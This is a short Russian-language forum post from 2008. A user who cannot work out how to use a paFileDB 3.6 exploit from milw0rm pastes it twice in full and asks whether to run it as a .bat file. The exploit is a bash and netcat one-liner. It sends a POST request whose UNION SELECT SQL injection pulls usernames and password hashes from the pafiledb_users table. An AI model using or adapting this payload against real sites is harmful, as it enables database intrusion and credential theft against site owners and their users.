geforse
14.12.2008, 14:32
на милворме (http://milw0rm.com/) есть сплойт (http://milw0rm.com/exploits/4186) для paFileDB 3.6 (http://www.phparena.net/scripts.php?script=pafiledb)
Я не пойму как с ним работать( вот это что за код ? o_0
На чём написан ? Может нужно сохранить как .bat и запустить ?
host="www.example.com"; echo -e "POST
http://$host/index.php?act=search&process HTTP/1.1\nHost: $host\nContent-Length:
302\n\nquery=test&search_in[]=file_name& search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1)
UNION SELECT ALL null,user_username,user_password,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null FROM (pafiledb_users"| netcat $host 80
Я не пойму как с ним работать( вот это что за код ? o_0
На чём написан ? Может нужно сохранить как .bat и запустить ?
host="www.example.com"; echo -e "POST
http://$host/index.php?act=search&process HTTP/1.1\nHost: $host\nContent-Length:
302\n\nquery=test&search_in[]=file_name& search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1)
UNION SELECT ALL null,user_username,user_password,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null FROM (pafiledb_users"| netcat $host 80